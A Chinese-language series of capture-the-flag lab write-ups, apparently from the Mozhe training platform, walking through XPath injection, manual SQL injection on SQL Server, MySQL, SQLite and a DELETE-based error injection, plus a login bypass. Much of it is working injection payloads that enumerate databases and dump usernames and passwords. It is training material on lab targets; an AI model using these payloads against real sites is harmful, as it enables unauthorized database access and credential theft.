这个字符串在逻辑上使查询一直返回True并将一直允许攻击者访问系统。攻击者可以利用Xpath在引用程序中动态的操作XML文档。攻击完成后登陆可以在通过Xpath盲入技术获取最高权限和其他重要账号。
例子
判断注入点:
网站url/demo.php?name=xml
,判断可能存在Xpath注入漏洞。
输入单引号,页面发生变化
分析:
Xpath中典型的查询语句如下:
//users/user[loginID/text()='user' and password/text()='password']
这里怀疑查询语句为:
//users/user[loginID/text()='xml' and password/text()='']
可以采用如下的方式实施注入攻击,绕过身份验证。如果用户传入一个login和password,例如loginID='user'和password='password',则该查询语句将返回true。但是如果用户传入类似' or 1=1 or ''=' 的值,那么查询语句也会得到true返回值,因为Xpath查询语句最终会变成下面的这种代码:
//users/user[loginID/text()=''or 1=1 or ''='' and password/text()=''or 1=1 or ''='']
闭合语句,绕过验证。
在网址后面加上' or '1=1' or ''=' 或者']|//*|//*['
' or '1=1' or ''=' 闭合语句再进行绕过
类似的还有,都可以实现绕过
'or '1'='1、'or '1'or'1、'or 1=1 or ''='、']|//*|//*['
']|//|//[' Xpath 语法,访问XML的所有节点类似sql注入,绕过查询条件
data:image/s3,"s3://crabby-images/1da7e/1da7e97e77a3a18aa386e1f052e3a8325a9a6e0a" alt=""
data:image/s3,"s3://crabby-images/5a36e/5a36e120c757900bffd8e427b3380120884cd9b8" alt=""
data:image/s3,"s3://crabby-images/a436f/a436f0e94b822a4ec221452184ce13cc9089f008" alt=""
10、SQL手工注入漏洞测试(Sql Server数据库) (不太熟)
做题之前首先要了解一下sql server数据库,这样才能更好的学习
sql server 的正式名称是“Microsoft SQL Server”。微软的数据库应用程序是“SQL Server”
其他几个数据库
Oracle:最著名的Oracle数据库。甲骨文公司的一款关系数据库管理系统
Mysql:一个开源数据库。通常用于WEB应用开发
SQL Server:Microsoft数据库,操作简单。
PostgreSQL:一个开源数据库,关系型数据库,功能强大。
DB2:是IBM一种分布式数据库解决方案。简单点:DB2就是IBM开发的一种大型关系型数据库平台。
Oracle和SQL Server通常在企业中使用比较多,占用率很高。Mysql通常在WEB应用开发中使用。
系统库
master
master数据库控制sql server的这个数据库中包含所有的配置信息、用户登陆信息、当前正在服务器运行中的过程的信息。
model
model数据库是当你建立一个新的数据库时,sql server会把model数据库中的所有对象建立一份拷贝并移动到新数据库中,在模板对象被拷贝到新的用户数据库之后,该数据库的所有多余空间都将被页面填满。
tempdb
tempdb数据库是一个非常特殊的数据库,这个库用来保存所有的
、存储过程和其他sql server建立的临时用的东西,例如:排序时要用到tempdb数据库,数据被放进tempdb数据库,排完序会再把结果返回给用户。每次sql server重启,它都会情况tempdb数据库并重建,
不要在tempdb数据库上面建立需要永久保存的表。
msdb
msdb数据库是sql server中的一个特例,如果你查看这个数据库的实际定义,会发现它其实是一个,不同之处是sql server拿这个数据库用来做什么,所有的任务调度、报警、操作员都存储在这个msdb数据库中给,该库的另一个功能是用来存储所有备份历史,sql server agent将会使用这个库。
information_schema
information_schema是在sql server 2000及跟高版本存在的,可以检索数据库中的对象的元数据,,它是符合iso标准的,与sys不同,sys是微软自己搞出来的。
注释方式
c语言注释风格 /*
sql 注释风格 --
空字节 ;%00
T-sql语句注释:/**/、--
系统视图
sys.databases:所有数据库名
data:image/s3,"s3://crabby-images/50ac1/50ac1ea646e51e449f17dbcc335ddcd8018b98d1" alt=""
information_schema.tables 当前数据库中的表
data:image/s3,"s3://crabby-images/36d21/36d21ad7c8697b8476ce736039c7a5478f65bcb7" alt=""
information_schema.columns 当前数据库列
data:image/s3,"s3://crabby-images/7f094/7f094a7ee19b80cdaf75cb9f16c00dfa08bd9e93" alt=""
sys.database_files 数据库数据文件
data:image/s3,"s3://crabby-images/efa59/efa598625aebcb58573178978bcf570e66887de3" alt=""
常用的全部变量
@@version:返回当前的Sql server安装的版本、处理器体系结构、生成日期和操作系统。
@@servername:放回运行Sql server的本地服务器名称
data:image/s3,"s3://crabby-images/5913f/5913fdf6abc89dbf42ba2b49c684ba11b8476220" alt=""
逻辑运算符
all:如果一组的比较都为true,那么为true
and:如果两个布尔表达式都为true,则为true
or:如果两个布尔表达式中的一个为true,则为true
any:如果一组的比较中,任何一个为true,那么为true
between:如果操作数在某个范围内,那么为true
in:如果操作数等于表达式列表之一,那么为true
like:如果操作数与一种模式相匹配,则为true
not:对任何其他布尔运算的值去反
some:如果在一组比较中,有些为true,则为true
top
在sql server,没有MySQL中的limit控制符,如果实现limit控制符功能则可以使用top进行代替
select top(n-m+1) id from tablename
where id not in (
select top m-1 id from tablename
)
data:image/s3,"s3://crabby-images/07dcc/07dcc0b00ac8da129d406c60a2bc563b90e1d89d" alt=""
data:image/s3,"s3://crabby-images/51312/513121e99a546d85db0617d23211d5706aa362f4" alt=""
连接运算符
+号是字符串串联运算符:'aaa+bbb'='aaabbb'
data:image/s3,"s3://crabby-images/c9320/c932025bfccc04b4f7d324ef20035bc237784c93" alt=""
函数
ASCII()、CHAR()、LEFT(str,i)、RIGHT(str,i)、LEN(str)、SUBSTRING(str,i,n)
STR(i):将数值转换到字符数据
类型转换
cast(x as type) 将一个类型转换成另一个类型 cast(10 as char(3))
系统函数
col_length(table,column) 返回表中指定字段长度值
col_name(table_id,column_id) 返回表中指定字段的名称
datalength(exp) 返回数据表达式的数据是实际长度
data:image/s3,"s3://crabby-images/04b8e/04b8ed2f8a6da3053150cf865101889e9b28548c" alt=""
data:image/s3,"s3://crabby-images/27bc2/27bc22493f751c9edf01920bb041f4cfae166d72" alt=""
db_name(database_id) 返回当前数据库的名称
data:image/s3,"s3://crabby-images/1ace1/1ace1e01cf5a394012a46a0789a01ec0a545dd48" alt=""
host_name 返回服务器计算器名称
data:image/s3,"s3://crabby-images/47ceb/47cebb0b6bc2735f62079425fb874fd5b03d14a9" alt=""
suser_sname 返回当前用户登录名
data:image/s3,"s3://crabby-images/d18f0/d18f091918d04f67e63c9c6e2d097e1045fa2c73" alt=""
user_name() 返回数据库用户名
data:image/s3,"s3://crabby-images/63474/63474cc2a89148f6d9c72ca12045c8ccafdfd03c" alt=""
基本注入
这里做一个判断and 1=1 和 and 1=2,来做一个简单的分析
data:image/s3,"s3://crabby-images/94e7c/94e7c8aaa61f6e2a6441acf49e90ad5c86c3735b" alt=""
判断字段数,3显示异常,4显示正常,5又是异常,不知道长度到底为2还是4
?id=2 order by 4
data:image/s3,"s3://crabby-images/b0375/b0375191a747e82ef715886974a4d7d40e6bc829" alt=""
判断显示位
通过sql语句中union select null,null,null,null 和union select null,null页面都是显示错误,说明系统禁止使用union进行相关SQL查询,我们得使用其他的方式进行查询union all select
union select null,null,null字段为4的时候正常的,可以看到回显,就不用布尔和时间盲注了。然后需要猜测数据类型,因为这个语句对应的字段的数据类型必须要正确,才不会报错。常用的一般就是字符和字符,然后分别尝试union all select 1,null,null,null正常,union all select 1,2,null,null正常,union all select 1,2,3,null异常,把3改为‘3’,正常,能看到回显了(一开始的3是数字类型,数据库的是字符串类型所以一直失败。)
data:image/s3,"s3://crabby-images/ef1b0/ef1b0e118c9f5762a75a90a5aace7f2343f36fd1" alt=""
?id=-2 union all select 1,2,'3',null
data:image/s3,"s3://crabby-images/6fa2b/6fa2b4a023a90ed96b2e4dec0f78ff3781acc12a" alt=""
枚举当前用户和数据库版本
?id=-2 union all select 1,system_user,@@version,2
data:image/s3,"s3://crabby-images/e9960/e99606d2fd30d5c578e13fea0e2f706adc2f6ef6" alt=""
当前数据库
?id=-2 union all select 1,system_user,db_name(),2
data:image/s3,"s3://crabby-images/d2149/d21498d6d48a6cd7fa50221ba2935fb510015182" alt=""
测试权限
?id=2/is_srvrolemember('sysadmin')
data:image/s3,"s3://crabby-images/33ceb/33ceb56d8dba139a2b01a7941346fce81633620a" alt=""
加号的使用
%2B是+的编码,url中不能直接使用,否则会别解析为空格
http://219.153.49.228:49135/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name(),@@version,2
翻译成为
http://219.153.49.228:49135/new_list.asp?id=2 and 1=0 union all select 1,system_user+'|'+db_name(),@@version,2
枚举出当前所有的数据库
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from master..sysdatabases
data:image/s3,"s3://crabby-images/0a652/0a652596d2032850272896db660671e93d9b48ef" alt=""
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from master..sysdatabases where name not in('master')
data:image/s3,"s3://crabby-images/360f7/360f7e0e7ae199e860b2646701c523b4325ec8bf" alt=""
按照上面方法,直到报错
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from master..sysdatabases where name not in('master','model','mozhe_db_v2','msdb','tempdb')
data:image/s3,"s3://crabby-images/8bfce/8bfce6c2b1ad3d17ab9bf8778d5c21d982be9d3d" alt=""
即得到所有的数据库为:
'master','model','mozhe_db_v2','msdb','tempdb'
我比较疑问的是这里为什么使用master..sysdatabases,百度了之后才知道,Microsoft SQL Server上的每个数据库在表中占一行。最初安装 SQL Server 时, sysdatabases 包含 master 、 model 、 msdb 、 mssqlweb 和 tempdb 数据库的项。该表只存储在 master 数据库中。
枚举出目标库的所有表
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from mozhe_db_v2..sysobjects where xtype='u'
data:image/s3,"s3://crabby-images/27759/277595c4bf5a67b74d195f173f0e167962aa717b" alt=""
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from mozhe_db_v2..sysobjects where xtype='u' and name not in ('manage')
data:image/s3,"s3://crabby-images/04be9/04be959345f3d65642a65d14b490ea18610705c4" alt=""
按照上面方法,直到报错
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from mozhe_db_v2..sysobjects where xtype='u' and name not in ('manage','announcement')
data:image/s3,"s3://crabby-images/ee33f/ee33f78f4e49e81b1642c3027bd50155c07a163b" alt=""
报错,结束
即得到所有的表名为:manage,announcement
需要解释的函数
MSsqlserver==microsoft sql server==mssql
这里的mmsql和MySQL语法有点不同,mmsql记录敏感信息的表在sysobjects中
当xtype='U' 代表是用户建立的表。
可以参考这里的文章进行学习和理解sysobjects、xtype
枚举出表的字段名
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),b.name,2 from mozhe_db_v2..sysobjects a, mozhe_db_v2..syscolumns b where a.xtype='U' and a.id=b.id and a.name='manage'
data:image/s3,"s3://crabby-images/fd867/fd8679dcf0dd3ceaeba02bd1aa0998a59aaffb45" alt=""
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),b.name,2 from mozhe_db_v2..sysobjects a, mozhe_db_v2..syscolumns b where a.xtype='U' and a.id=b.id and a.name='manage' and b.name not in ('id')
data:image/s3,"s3://crabby-images/d19f6/d19f6d2fd940092d7e6e774d117b08b90538954f" alt=""
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),b.name,2 from mozhe_db_v2..sysobjects a, mozhe_db_v2..syscolumns b where a.xtype='U' and a.id=b.id and a.name='manage' and b.name not in ('id','username','password')
data:image/s3,"s3://crabby-images/5b982/5b982d31aaa393069b84ce0011f61368296d1283" alt=""
即得到表manage的字段名为:id,username,password
同理
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),b.name,2 from mozhe_db_v2..sysobjects a, mozhe_db_v2..syscolumns b where a.xtype='U' and a.id=b.id and a.name='announcement'
data:image/s3,"s3://crabby-images/7f554/7f5548b5fec8332c0a46c03429e94e69e9405ffb" alt=""
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),b.name,2 from mozhe_db_v2..sysobjects a, mozhe_db_v2..syscolumns b where a.xtype='U' and a.id=b.id and a.name='announcement' and b.name not in ('id','title','contents','times')
data:image/s3,"s3://crabby-images/6f50f/6f50feeb30e9c2b2451425275819ec6f92c6c998" alt=""
得到表announcement的字段名为:id,title,contents,times
或者使用下面的方法进行枚举
?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),1) from sysobjects),'3',null
data:image/s3,"s3://crabby-images/85b69/85b6963fb3bf8f909e347c706c1db2881bcb8755" alt=""
?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),2) from sysobjects),'3',null
data:image/s3,"s3://crabby-images/98811/988115858df84e7bc7dcfe87b10b23f35321da65" alt=""
?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),3) from sysobjects),'3',null
data:image/s3,"s3://crabby-images/43a28/43a28b6828b5bccd005957b931c9efbbf0b25643" alt=""
也可以获取到manage的字段名为:id,username,password
需要解释的函数
col_name()、object()
col_name() 可以根据id值得到对象的名称,而且可以返回指定下标显示的结果
object()数据库中每个对象都有一个唯一的id值,object_id(name)可以根据表对象名称得到对象id,object_id()只能返回用户创建的对象id,像sys开头的表都是系统表,无法返回
爆字段内容
?id=-2 union all select 1,(select username from manage),(select password from manage where username in ('admin')),null
data:image/s3,"s3://crabby-images/13156/13156e3e9479f50e9e22017ea9910302c558e5f3" alt=""
?id=-2 union all select 1,(select password from manage),(select username from manage where password in ('password')),null
data:image/s3,"s3://crabby-images/8248c/8248cd979e8e294d97c6b86a79a22ea22055352e" alt=""
11、SQL注入漏洞测试(delete注入)
当提交留言的时候,删除,左下角会出现id
data:image/s3,"s3://crabby-images/5c67b/5c67bd3f2bb718957b5bb7aaa404857a596fd7de" alt=""
输入单引号,页面报错,测试注入 ,尝试order by ,失败
data:image/s3,"s3://crabby-images/5cb29/5cb29c7e6a697e3004051c0b6eb178155b9adcf1" alt=""
测试and,页面正常回显
data:image/s3,"s3://crabby-images/5b788/5b788b3f060c4cf7219d96016f5f8f50151c2efe" alt=""
尝试使用报错注入,用到的函数,之前上面也讲过。
枚举当前数据库
?id=-61 and (updatexml(null,concat(0x7e,(select database()),0x7e),1)) #pikaqiu
data:image/s3,"s3://crabby-images/4102a/4102ae463cec91024e564b5938a40c31a036591c" alt=""
枚举当前表
?id=-61 and (updatexml(null,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)) #message
data:image/s3,"s3://crabby-images/45bb8/45bb8b6a8102bd3fa8e83e224cf547ff7fa0dd46" alt=""
爆字段
?id=-61 and (updatexml(null,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='message'),0x7e),1)) #id,content,time,key
data:image/s3,"s3://crabby-images/4f24d/4f24d594e3ae2b1caa8ea7c5ff0b35d8ba99e02d" alt=""
爆字段的值
1.因为报错内容回显只能回显32位,而"~"占了一个字符,所以爆出来的key值是少1位的,知道原因后就有很多处理方法了,可以有right()方法,也可以爆出31位密码,最后1位一个一个试。
方法:1
?id=-61 and updatexml(1,concat(0x7e,right((select group_concat(`key`) from message),32),0x7e),0)
data:image/s3,"s3://crabby-images/0b422/0b42297ddd3f523b132c0d50b97e0ae5200fa3db" alt=""
2.key要用单引号括住,否则会报错,因为key是保留字段。参考网站
3.因为这个是请求删除的url,前面的如果你请求id为61~65,因为墨者服务器数据库里面存的key的数据在这个范围(没精确到是哪个),当前面注入成功的时候也会删除对应id的key内容,导致最后出现爆字段key值的时候,很多评论会有key值为空的情况。如果遇到这种情况,重启环境再爆字段即可。这种方式我也是参考网上的。
方法2:
?id=-60 and updatexml(1,concat(0x7e,(select group_concat(`key`) from message),0x7e),1)
data:image/s3,"s3://crabby-images/f2856/f2856ab90a5765cb45ac145b390ab6947dd90351" alt=""
提交flag。
10、SQL注入实战-MySQL
打开题目,发现url的id参数有一串base64,MQo=解码,得到1
利用这种思路,进行注入测试
所有参数都需要加密成base64进行测试
输入',页面出现异常,可能存在注入,继续测试
?id=MSc=
data:image/s3,"s3://crabby-images/c51f3/c51f3ddd5b9d181f5ef8a99b1a208f62344e7955" alt=""
判断注入类型
and 1=1 页面正常
and 1=2 页面异常
?id=MSBhbmQgMT0x and 1=1
?id=MSBhbmQgMT0y and 1=2
data:image/s3,"s3://crabby-images/3435d/3435dc9623e199022a0f2db0e93609c999075e57" alt=""
data:image/s3,"s3://crabby-images/ba3bc/ba3bcd477ba97a13138b49267ee168c5bf3a1b9a" alt=""
数值型注入
判断字段长度
order by 2 页面正常 3 页面异常
?id=MSBvcmRlciBieSAy
data:image/s3,"s3://crabby-images/7042e/7042e249d2c381fb196b892d8714bfa7c9da04d2" alt=""
判断显示位
?id=LTEgdW5pb24gc2VsZWN0IDEsMg==
data:image/s3,"s3://crabby-images/7b611/7b61139cdbeab06facf49724f3c999604acae2ee" alt=""
枚举当前数据库
?id=LTEgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksMg==
data:image/s3,"s3://crabby-images/84968/84968b92160bfc7f12daa2ce876581774841fd1d" alt=""
枚举所有数据库
?id=-1 union select schema_name,2 from information_schema.schemata limit 0,1
通过调整limit即可遍历出所有的数据库,调整方法为limit 0,1;limit 1,2;limit 2,3……直到出现错误或异常,两个库
data:image/s3,"s3://crabby-images/4b4e3/4b4e364f57ffef1404a377c484ee4313c11c43bf" alt=""
获取表里面的内容
?id=-1 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()
data:image/s3,"s3://crabby-images/14659/146593387b088b399cbafaa9a42cc98d85b8b280" alt=""
枚举表中的列
-1 union select group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name='data'
data:image/s3,"s3://crabby-images/ba248/ba2481c38f1cd61effde1dbd760359ed9ce3c2ce" alt=""
获取key值
?id=-1 union select group_concat(id,0x7e,title,0x7e,main,0x7e,thekey,0x7e),2 from data
data:image/s3,"s3://crabby-images/da096/da09618cccdd5a0151dda35a2a93221afc13b384" alt=""
得到key,进行提交
11、SQL注入漏洞测试(登录绕过)
根据题目提示使用万能密码测试
账号:'or 1=1 --+
密码随便输入或者不输入也可以
分析登陆成功原因
账号查询时把用户名和密码放在一条查询语句中查询
语句为:
select * from user where username='$username' and password="$password"
当用户名中'闭合了前面的'or 1=1 永远为真 --+是sql语句注释,所有不用数据密码即可登陆账号。
12、SQL手工注入漏洞测试(SQLite数据库)
漏洞利用前,首先要了解SQLite数据库数据结构
sqlite数据库有两个内指表:和
,前者存放当前数据库中所有表相关的信息,比如表的名称、用于创建此表的sql语句、索引、索引所属的表、sql语句,后者则是存放临时表的相关信息。这两个表的结构为“
type TEXT,
name TEXT,
tbl_name TEXT,
rootpage INTEGER,
sql TEXT
sqlite有一个隐藏表sqlite_master。从里面拿到我们需要的表明。sqlite_master里的name是数据库名,sql是我们需要的字段/列名
输入单引号页面出现异常
继续测试,判断注入类型
and 1=1 页面正常
and 1=2 页面异常
data:image/s3,"s3://crabby-images/5ec88/5ec88086630ea2063aff1c405b5ff81d6c4d99a9" alt=""
数值型注入
判断字段长度
order by 4 正常,5报错
data:image/s3,"s3://crabby-images/108f4/108f4741fa2db3febd10b654d6ca8e8e21c3c77d" alt=""
判断显示位
?id=-1 union select 1,2,3,4
data:image/s3,"s3://crabby-images/44b45/44b45f8128823a8c35917061d6b8a802ecd8a518" alt=""
枚举当前数据表 MySQL对应的是information_schema,sqlite对应sqlite_master
?id=1 union select 1,2,(select group_concat(tbl_name) from sqlite_master),4
data:image/s3,"s3://crabby-images/ba9c0/ba9c0518139e60dabf132c27b65c9115e31d6840" alt=""
或者
?id=1 union select 1,name,sql,4 from sqlite_master limit 0,1
通过调整limit即可遍历出所有的数据库,调整方法为limit 0,1;limit 1,2;limit 2,3……直到出现错误或异常
上面语句中name相当于mysql的table_name
data:image/s3,"s3://crabby-images/bf1aa/bf1aa02cd9bf1cd8d6d57f4aa49883689dc17bfe" alt=""
字段
?id=1 union select 1,2,sql,4 from sqlite_master where type='table' and name='WSTMart_reg' limit 0,1
上列语句语句中的sql相当于mysql中的column_name
data:image/s3,"s3://crabby-images/bd660/bd660209aab6ea4a167f21c1271a539dc5685335" alt=""
从返回的结果可以看到name,password等字段
?id=1 union select 1,name,password,4 from WSTMart_reg
data:image/s3,"s3://crabby-images/c6406/c640688b40428eeb85178d92002add6c66f0152a" alt=""
解密登陆,提交flag.